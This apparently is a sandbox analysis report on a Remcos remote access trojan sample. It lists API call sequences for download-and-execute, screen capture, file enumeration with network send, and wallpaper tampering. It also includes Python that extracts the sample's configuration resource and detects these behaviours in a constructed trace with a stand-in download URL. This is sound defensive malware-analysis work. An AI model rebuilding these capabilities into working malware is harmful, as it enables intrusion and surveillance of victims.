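The FindResourceA(SETTINGS, 0xA) / LoadResource / LockResource / SizeofResource sequence in the entry above reads a raw-data resource (type 0xA is RT_RCDATA) named SETTINGS out of the sample's own image; SETTINGS is the resource in which Remcos keeps its encrypted configuration, which is what the overview's "Found malware configuration" refers to. The Python below is an added example, not code from this report or from the sample: it walks a PE resource directory the way FindResource does (type level, then name level, then language level, with the name compared case-insensitively) and returns the payload bytes, so the blob can be pulled from a memory dump or the file on disk without executing anything. The three-level directory it parses is constructed inline as sample input; the section RVA 0x30000 and the payload bytes are assumptions. What the SETTINGS blob encodes is not shown on this page and is not decoded here.

```python
import struct

RT_RCDATA = 10  # resource type 0xA, the second argument of FindResourceA in the listing


def _read_directory(rsrc, offset):
    """Return (key, is_subdirectory, target_offset) for each entry of an IMAGE_RESOURCE_DIRECTORY.

    Offsets in the tree are relative to the start of the .rsrc section, not RVAs."""
    # Characteristics, TimeDateStamp, MajorVersion, MinorVersion, NumberOfNamedEntries, NumberOfIdEntries
    named, by_id = struct.unpack_from("<HH", rsrc, offset + 12)
    entries = []
    for i in range(named + by_id):
        name_field, data_field = struct.unpack_from("<II", rsrc, offset + 16 + 8 * i)
        if name_field & 0x80000000:
            # Named entry: section offset of a length-prefixed UTF-16LE string (no terminator).
            str_off = name_field & 0x7FFFFFFF
            (length,) = struct.unpack_from("<H", rsrc, str_off)
            key = rsrc[str_off + 2:str_off + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name_field  # numeric id: a type id, a MAKEINTRESOURCE name, or a language id
        entries.append((key, bool(data_field & 0x80000000), data_field & 0x7FFFFFFF))
    return entries


def find_resource(rsrc, rsrc_rva, res_type, name):
    """Mimic FindResource(type, name) on a raw .rsrc section and return the payload, or None.

    rsrc_rva is the section's VirtualAddress: IMAGE_RESOURCE_DATA_ENTRY holds an RVA, not a
    section offset. Names compare case-insensitively, as the loader does. The first language
    entry is taken; the real FindResource applies thread-language fallback before doing so."""
    for type_key, is_dir, type_off in _read_directory(rsrc, 0):
        if type_key != res_type or not is_dir:
            continue
        for name_key, is_dir2, name_off in _read_directory(rsrc, type_off):
            if not is_dir2 or str(name_key).upper() != name.upper():
                continue
            for _lang, is_dir3, entry_off in _read_directory(rsrc, name_off):
                if is_dir3:
                    continue
                data_rva, size, _codepage, _reserved = struct.unpack_from("<IIII", rsrc, entry_off)
                start = data_rva - rsrc_rva
                if start < 0 or start + size > len(rsrc):
                    raise ValueError("resource data entry points outside the .rsrc section")
                return bytes(rsrc[start:start + size])
    return None


def build_rsrc(rsrc_rva, res_type, name, payload):
    """Constructed sample input: a minimal three-level tree with one named entry of res_type."""
    def directory(key, target, is_dir, named):
        header = struct.pack("<IIHHHH", 0, 0, 0, 0, 1 if named else 0, 0 if named else 1)
        return header + struct.pack("<II", key, target | (0x80000000 if is_dir else 0))

    type_dir, name_dir, lang_dir, data_entry = 0, 24, 48, 72   # each directory is 16 + 8 bytes
    name_str = data_entry + 16
    name_bytes = struct.pack("<H", len(name)) + name.encode("utf-16-le")
    data_off = (name_str + len(name_bytes) + 3) & ~3            # payload starts 4-byte aligned
    blob = bytearray()
    blob += directory(res_type, name_dir, True, False)                     # level 1: type id
    blob += directory(0x80000000 | name_str, lang_dir, True, True)         # level 2: string name
    blob += directory(0x0409, data_entry, False, False)                    # level 3: language (en-US)
    blob += struct.pack("<IIII", rsrc_rva + data_off, len(payload), 0, 0)  # IMAGE_RESOURCE_DATA_ENTRY
    blob += name_bytes
    blob += b"\0" * (data_off - len(blob))
    blob += payload
    return bytes(blob)


def extract_settings(rsrc, rsrc_rva):
    """The lookup the sample performs: RT_RCDATA resource named SETTINGS."""
    return find_resource(rsrc, rsrc_rva, RT_RCDATA, "SETTINGS")


if __name__ == "__main__":
    sample = build_rsrc(0x30000, RT_RCDATA, "SETTINGS", b"constructed-settings-blob")  # assumed RVA and bytes
    print(extract_settings(sample, 0x30000))
```

On a real file, pass the raw `.rsrc` section and that section's VirtualAddress (with pefile: `section.get_data()` and `section.VirtualAddress`); on a process dump, the same section can be cut out at its virtual address since the image is already mapped.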
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 00407A91
                                                • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstH_prologNext
                                                • String ID:
                                                • API String ID: 1157919129-0
                                                • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                APIs
                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                • _free.LIBCMT ref: 00448067
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 00448233
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                • String ID:
                                                • API String ID: 1286116820-0
                                                • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: DownloadExecuteFileShell
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$open
                                                • API String ID: 2825088817-2582742282
                                                • Opcode ID: 994fa26aecbf6e7c3222de66d1bae1110effc07295645d0cc09e5d0c67af1d4a
                                                • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                • Opcode Fuzzy Hash: 994fa26aecbf6e7c3222de66d1bae1110effc07295645d0cc09e5d0c67af1d4a
                                                • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: FileFind$FirstNextsend
                                                • String ID: x@G$x@G
                                                • API String ID: 4113138495-3390264752
                                                • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                APIs
                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                  • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                  • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CloseCreateInfoParametersSystemValue
                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                • API String ID: 4127273184-3576401099
                                                • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
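Two of the entries above describe host-level effects rather than CRT internals. The ShellExecuteW("open") and URLDownloadToFileW pair at 00406234/00406318 is the download-and-launch capability listed in the overview. The SystemParametersInfoW(00000014, 0, path, 00000003) call at 0041BC6C, together with the RegCreateKeyA(80000001, Control Panel\Desktop) and RegSetValueExA writes in its subcall, is the wallpaper change: 0x80000001 is HKEY_CURRENT_USER, 0x14 is SPI_SETDESKWALLPAPER, and 3 is SPIF_UPDATEINIFILE | SPIF_SENDCHANGE, which persists the new wallpaper to the user profile and broadcasts the change, and the WallpaperStyle and TileWallpaper values are set first so the image is displayed as intended. The Python below is an added example and not part of the report: it correlates both call patterns per process over a sandbox-style API trace. The trace format (pid|api|comma-separated arguments) and the eight trace lines are constructed for the example; a real trace needs its own parser, and arguments containing commas would need quoting this format does not have.

```python
from collections import defaultdict

SPI_SETDESKWALLPAPER = 0x14
SPIF_UPDATEINIFILE = 0x01
SPIF_SENDCHANGE = 0x02

# Constructed sample trace (not from the report): one call per line, "pid|api|arg,arg,...".
SAMPLE_TRACE = """\
4812|URLDownloadToFileW|0,http://example.invalid/u.exe,C:\\Users\\Public\\u.exe,0,0
4812|ShellExecuteW|0,open,C:\\Users\\Public\\u.exe,0,0,1
4812|RegCreateKeyA|0x80000001,Control Panel\\Desktop
4812|RegSetValueExA|Control Panel\\Desktop,WallpaperStyle,0,REG_SZ,2
4812|RegSetValueExA|Control Panel\\Desktop,TileWallpaper,0,REG_SZ,0
4812|SystemParametersInfoW|0x14,0,C:\\Users\\Public\\w.bmp,3
1200|URLDownloadToFileW|0,http://example.invalid/doc.pdf,C:\\Users\\Public\\doc.pdf,0,0
1200|ShellExecuteW|0,open,C:\\Windows\\notepad.exe,0,0,1
"""


def parse_trace(text):
    """Split the trace into (pid, api, args) tuples; argument strings keep their original case."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, api, args = line.split("|", 2)
        calls.append((int(pid), api, args.split(",")))
    return calls


def download_then_execute(calls):
    """Return (pid, path) for each ShellExecuteW("open", path) whose path the same process
    wrote earlier with URLDownloadToFileW (szFileName is its third argument)."""
    downloaded = defaultdict(set)
    hits = []
    for pid, api, args in calls:
        if api == "URLDownloadToFileW":
            downloaded[pid].add(args[2].lower())
        elif api == "ShellExecuteW" and args[1].lower() == "open":
            if args[2].lower() in downloaded[pid]:
                hits.append((pid, args[2]))
    return hits


def wallpaper_tamper(calls):
    """Return (pid, image_path) when a process sets both wallpaper style values under
    Control Panel\\Desktop and then calls SystemParametersInfoW(SPI_SETDESKWALLPAPER, ...)
    with SPIF_UPDATEINIFILE | SPIF_SENDCHANGE, i.e. persists and broadcasts the change."""
    wanted = {"wallpaperstyle", "tilewallpaper"}
    persist_flags = SPIF_UPDATEINIFILE | SPIF_SENDCHANGE
    style_writes = defaultdict(set)
    hits = []
    for pid, api, args in calls:
        if api == "RegSetValueExA" and args[0].lower().endswith("control panel\\desktop"):
            style_writes[pid].add(args[1].lower())
        elif api == "SystemParametersInfoW" and int(args[0], 0) == SPI_SETDESKWALLPAPER:
            flags = int(args[3], 0)
            if (flags & persist_flags) == persist_flags and wanted <= style_writes[pid]:
                hits.append((pid, args[2]))
    return hits


def scan(text=SAMPLE_TRACE):
    """Run both correlations over a trace and return the hits per rule."""
    calls = parse_trace(text)
    return {"download_then_execute": download_then_execute(calls),
            "wallpaper_tamper": wallpaper_tamper(calls)}


if __name__ == "__main__":
    for rule, hits in scan().items():
        print(rule, hits)
```

Process 1200 in the constructed trace downloads a file but opens an unrelated program, so only process 4812 is reported; keying the correlation on the downloaded path rather than on the mere presence of both APIs is what keeps a legitimate downloader from matching.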
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                • String ID:
                                                • API String ID: 4212172061-0
                                                • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 00408DAC
                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: FileFind$FirstH_prologNext
                                                • String ID:
                                                • API String ID: 301083792-0
                                                • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                • String ID:
                                                • API String ID: 2829624132-0
                                                • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                • String ID:
                                                • API String ID: 1815803762-0
                                                • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                • Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                • Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID: <D
                                                • API String ID: 1084509184-3866323178
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID: <D
                                                • API String ID: 1084509184-3866323178
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: GetLocaleInfoEx
                                                • API String ID: 2299586839-2904428671
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                Similarity
                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                • String ID:
                                                • API String ID: 1663032902-0
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                • String ID:
                                                • API String ID: 2692324296-0
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                APIs
                                                  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                Similarity
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                • String ID:
                                                • API String ID: 1272433827-0
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID:
                                                • API String ID: 1084509184-0
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                APIs
                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                • DeleteDC.GDI32(?), ref: 0041805D
                                                • DeleteDC.GDI32(00000000), ref: 00418060
                                                • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                • GetIconInfo.USER32(?,?), ref: 004180CB
                                                • DeleteObject.GDI32(?), ref: 004180FA
                                                • DeleteObject.GDI32(?), ref: 00418107
                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                • DeleteDC.GDI32(?), ref: 0041827F
                                                • DeleteDC.GDI32(00000000), ref: 00418282
